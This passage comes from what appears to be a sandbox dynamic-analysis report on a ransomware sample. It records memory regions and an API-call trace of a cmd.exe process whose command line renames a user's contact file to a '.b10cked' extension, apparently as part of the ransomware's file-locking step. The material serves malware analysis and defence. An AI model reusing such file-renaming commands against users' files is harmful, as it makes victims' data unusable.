Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32489 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32490 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32491 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32492 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 32493 start_va = 0x49fd0000 end_va = 0x4a01bfff entry_point = 0x49fd0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32494 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32495 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32496 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32497 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 32498 start_va = 0x7ffdf000 end_va = 
0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32567 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32568 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32569 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 32570 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 32571 start_va = 0x310000 end_va = 0x376fff entry_point = 0x310000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32572 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32573 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32574 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32575 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32576 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32577 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32578 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32579 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32580 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32581 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 32582 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32583 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32584 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 32585 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 32586 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 32587 
start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 32588 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 32589 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 32590 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 763 os_tid = 0xaa4 [0217.970] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f7b4 | out: lpSystemTimeAsFileTime=0x30f7b4*(dwLowDateTime=0xb6b7cac0, dwHighDateTime=0x1d440a9)) [0217.970] GetCurrentProcessId () returned 0x968 [0217.970] GetCurrentThreadId () returned 0xaa4 [0217.970] GetTickCount () returned 0x3ceb3 [0217.970] QueryPerformanceCounter (in: lpPerformanceCount=0x30f7ac | out: lpPerformanceCount=0x30f7ac*=27475967004) returned 1 [0217.971] GetModuleHandleA (lpModuleName=0x0) returned 0x49fd0000 [0217.971] __set_app_type (_Type=0x1) [0217.971] __p__fmode () returned 0x76b331f4 [0217.971] __p__commode () returned 0x76b331fc [0217.971] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ff21a6) returned 0x0 [0217.971] __getmainargs (in: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c, _DoWildCard=0, _StartInfo=0x49ff4140 | out: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c) returned 0 [0217.971] GetCurrentThreadId () returned 0xaa4 [0217.971] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaa4) returned 0x38 [0217.972] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.972] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0217.972] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.972] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, 
HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.972] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f744 | out: phkResult=0x30f744*=0x0) returned 0x2 [0217.972] VirtualQuery (in: lpAddress=0x30f77b, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.972] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0217.972] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0217.972] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.972] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0217.972] GetConsoleOutputCP () returned 0x1b5 [0217.972] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0217.972] SetConsoleCtrlHandler (HandlerRoutine=0x49fee72a, Add=1) returned 1 [0217.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.972] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0217.973] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.973] GetConsoleMode (in: hConsoleHandle=0x7, 
lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0217.973] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.973] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0217.973] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.973] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0217.973] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.973] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0217.973] GetEnvironmentStringsW () returned 0xc0180* [0217.973] FreeEnvironmentStringsW (penv=0xc0180) returned 1 [0217.973] GetEnvironmentStringsW () returned 0xc0180* [0217.973] FreeEnvironmentStringsW (penv=0xc0180) returned 1 [0217.974] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e6b4 | out: phkResult=0x30e6b4*=0x40) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0xa8, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x0, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, 
lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0217.974] RegCloseKey (hKey=0x40) returned 0x0 [0217.974] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e6b4 | out: phkResult=0x30e6b4*=0x40) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x0, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, 
lpData=0x30e6c0*=0x9, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x9, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x9, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0217.974] RegCloseKey (hKey=0x40) returned 0x0 [0217.974] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b3 [0217.974] srand (_Seed=0x5b8863b3) [0217.974] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked\"" [0217.974] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked\"" [0217.974] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.975] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xc18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0217.975] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.975] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.975] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.975] _wcsicmp (_String1="PROMPT", 
_String2="CD") returned 13 [0217.975] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0217.975] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0217.975] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0217.975] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0217.975] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0217.975] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0217.975] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0217.975] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0217.975] GetEnvironmentStringsW () returned 0xc22d0* [0217.975] FreeEnvironmentStringsW (penv=0xc22d0) returned 1 [0217.975] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.975] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.975] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0217.975] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0217.975] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0217.975] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0217.976] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0217.976] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0217.976] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0217.976] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0217.976] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f480 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.976] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f480, lpFilePart=0x30f47c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f47c*="Desktop") returned 0x18 [0217.976] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.976] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f1fc | out: lpFindFileData=0x30f1fc) returned 0xc0010 [0217.976] FindClose (in: hFindFile=0xc0010 | out: hFindFile=0xc0010) returned 1 [0217.976] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f1fc | out: lpFindFileData=0x30f1fc) returned 0xc0010 [0217.976] FindClose (in: hFindFile=0xc0010 | out: hFindFile=0xc0010) returned 1 [0217.976] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f1fc | out: lpFindFileData=0x30f1fc) returned 0xc0010 [0217.976] FindClose (in: hFindFile=0xc0010 | out: hFindFile=0xc0010) returned 1 [0217.977] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.977] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0217.977] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0217.977] GetEnvironmentStringsW () returned 0xc2af0* [0217.977] FreeEnvironmentStringsW (penv=0xc2af0) returned 1 [0217.977] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.977] GetConsoleOutputCP () returned 0x1b5 [0217.977] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0217.977] GetUserDefaultLCID () returned 0x409 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ff4950, cchData=8 | out: lpLCData=":") returned 2 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f5c0, cchData=128 | out: lpLCData="0") returned 2 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f5c0, cchData=128 | out: lpLCData="0") returned 2 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, 
lpLCData=0x30f5c0, cchData=128 | out: lpLCData="1") returned 2 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ff4940, cchData=8 | out: lpLCData="/") returned 2 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ff4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ff4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ff4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ff4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ff4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ff4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ff4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ff4930, cchData=8 | out: lpLCData=".") returned 2 [0217.980] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ff4920, cchData=8 | out: lpLCData=",") returned 2 [0217.980] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0217.980] GetConsoleTitleW (in: lpConsoleTitle=0xb08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.981] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.981] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0217.981] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0217.981] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0217.981] _wcsicmp (_String1="move", _String2=")") returned 68 [0217.981] _wcsicmp (_String1="FOR", 
_String2="move") returned -7 [0217.981] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0217.981] _wcsicmp (_String1="IF", _String2="move") returned -4 [0217.981] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0217.981] _wcsicmp (_String1="REM", _String2="move") returned 5 [0217.982] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0217.984] GetConsoleTitleW (in: lpConsoleTitle=0x30f2b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.984] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0217.984] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0217.984] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0217.984] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0217.984] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0217.984] _wcsicmp (_String1="move", _String2="CD") returned 10 [0217.984] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0217.984] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0217.984] _wcsicmp (_String1="move", _String2="REN") returned -5 [0217.984] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0217.984] _wcsicmp (_String1="move", _String2="SET") returned -6 [0217.984] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0217.984] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0217.984] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0217.984] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0217.984] _wcsicmp (_String1="move", _String2="MD") returned 11 [0217.984] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0217.984] _wcsicmp (_String1="move", _String2="RD") returned -5 [0217.984] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0217.984] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0217.984] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0217.985] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0217.985] _wcsicmp 
(_String1="move", _String2="CLS") returned 10 [0217.985] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0217.985] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0217.985] _wcsicmp (_String1="move", _String2="VER") returned -9 [0217.985] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0217.985] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0217.985] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0217.985] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0217.985] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0217.985] _wcsicmp (_String1="move", _String2="START") returned -6 [0217.985] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0217.985] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0217.985] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0217.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.986] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f074, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f06c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f06c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", 
